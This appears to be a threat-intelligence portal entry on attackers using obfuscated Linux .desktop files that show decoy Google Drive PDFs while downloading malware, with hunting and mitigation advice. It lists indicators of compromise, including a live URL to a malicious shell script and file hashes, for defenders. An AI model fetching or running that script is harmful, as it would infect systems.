Skip to main content

Actionable threat hunting with Threat Intelligence (I) - Hunting malicious desktop files

Medium
Published: Fri May 16 2025 (05/16/2025, 08:22:12 UTC)
Source: AlienVault OTX

Description

This analysis explores the detection of malicious .desktop files used by threat actors to infect Linux systems. It explains the structure of these files and how they are manipulated to obfuscate malicious content. The report details the execution process of these files, which often involve opening PDF files from Google Drive as a distraction while downloading malware. Various threat hunting techniques are presented, including searching for specific processes, command lines, and file contents. The article provides several Google Threat Intelligence queries for identifying suspicious .desktop files and related malicious activities. It also includes a list of recently discovered samples potentially linked to a campaign reported by Zscaler.

AI-Powered Analysis

AILast updated: 06/19/2025, 18:16:42 UTC

Technical Analysis

This threat involves the use of malicious .desktop files to compromise Linux systems. .desktop files are configuration files used by Linux desktop environments such as GNOME, KDE, and XFCE to define how applications are launched, including their icons, names, and execution commands. Threat actors manipulate these files to embed obfuscated malicious commands that execute malware payloads when the user interacts with them. A common tactic observed is the use of these .desktop files to open seemingly benign PDF documents hosted on Google Drive, serving as a distraction or social engineering lure. Meanwhile, in the background, the malicious .desktop file initiates the download and execution of malware, effectively bypassing casual user scrutiny. The obfuscation techniques employed in these files complicate detection, as the malicious commands are hidden within legitimate-looking desktop entry syntax. The report outlines various threat hunting methodologies, including searching for suspicious process names, command-line arguments, and specific file content patterns associated with these malicious .desktop files. It also provides Google Threat Intelligence queries to identify such files and related malicious activities. The campaign appears to be ongoing, with recently discovered samples linked to a Zscaler-reported campaign, although no known exploits are currently in the wild. The threat primarily targets Linux desktop environments, leveraging common user behaviors and trusted cloud services like Google Drive to facilitate infection.

Potential Impact

For European organizations, this threat poses a moderate risk primarily to endpoints running Linux desktop environments, which are prevalent in certain sectors such as research institutions, software development firms, and government agencies. Successful exploitation can lead to unauthorized execution of malware, potentially resulting in data exfiltration, system compromise, or lateral movement within networks. The use of Google Drive-hosted PDFs as a social engineering vector increases the likelihood of user interaction, thereby raising the risk of infection. While the threat does not currently exploit known vulnerabilities or widespread zero-days, the obfuscation and stealthy execution tactics can delay detection and response. Organizations relying on Linux desktops for critical operations may face disruptions or confidentiality breaches if infected. Additionally, the campaign’s use of legitimate cloud services complicates traditional network-based detection, potentially allowing malware to bypass perimeter defenses. The medium severity reflects the balance between the targeted nature of the attack and the potential for impactful compromise if successful.

Mitigation Recommendations

To mitigate this threat effectively, European organizations should implement targeted controls beyond generic Linux security best practices. First, enforce strict execution policies for .desktop files, such as restricting execution permissions to trusted directories and users, and auditing any new or modified .desktop files for suspicious content or obfuscation patterns. Deploy endpoint detection and response (EDR) solutions capable of parsing and analyzing .desktop files and their execution chains, including monitoring for unusual process launches linked to PDF viewers or network connections to cloud storage services like Google Drive. Integrate threat hunting queries similar to those provided in the report into SIEM platforms to proactively identify indicators of compromise related to malicious .desktop files. User awareness training should emphasize the risks of interacting with unsolicited or unexpected desktop shortcuts and documents, especially those referencing cloud-hosted files. Network segmentation can limit the spread of malware if an endpoint is compromised. Finally, consider implementing application whitelisting or sandboxing for desktop file execution to prevent unauthorized code execution. Regularly update and patch Linux desktop environments and associated software to reduce the attack surface, even though no specific vulnerabilities are exploited in this campaign.

Need more detailed analysis?Get Pro

Technical Details

Author
AlienVault
Tlp
white
References
[]
Adversary

Indicators of Compromise

Url

ValueDescriptionCopy
urlhttps://minio.daviduwu.ovh/public/check.sh

Hash

ValueDescriptionCopy
hash5c71c683ff55530c73477e0ff47a1899
MD5 of b6170fd0a1a75e043cd412300db4c67a351f71a6
hash70a0792640bbcae03627de25de3ee42f
MD5 of 040711b2e577fcdba8dc130f72475935893e8471
hash040711b2e577fcdba8dc130f72475935893e8471
hash1814730cb451b930573c6a52f047301bff0b84d1
hash8d61ce3651eb070c8cdb76a334a16e53ad865572
hashb6170fd0a1a75e043cd412300db4c67a351f71a6
hashe099572fe108bfba526730dcf87d953c74dcba0d
hasheb35be47387605ba194e5422c5f1e99e6968af65
hash7a2f7357ce5ebd03bbf10b856a30706f71eb1586c309aff9169fb5b056791741
SHA256 of b6170fd0a1a75e043cd412300db4c67a351f71a6
hashef2056a6724ad654e3c36234863ab34b9e0e6fa3e6f31340682c37dc2c5cb32e
SHA256 of 040711b2e577fcdba8dc130f72475935893e8471

Threat ID: 682c992c7960f6956616a5d6

Added to database: 5/20/2025, 3:01:00 PM

Last enriched: 6/19/2025, 6:16:42 PM

Last updated: 7/23/2025, 9:33:46 AM

Views: 11

Actions

PRO

Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.

Please log in to the Console to use AI analysis features.

External Links

Need enhanced features?

Contact root@offseq.com for Pro access with improved analysis and higher rate limits.

Latest Threats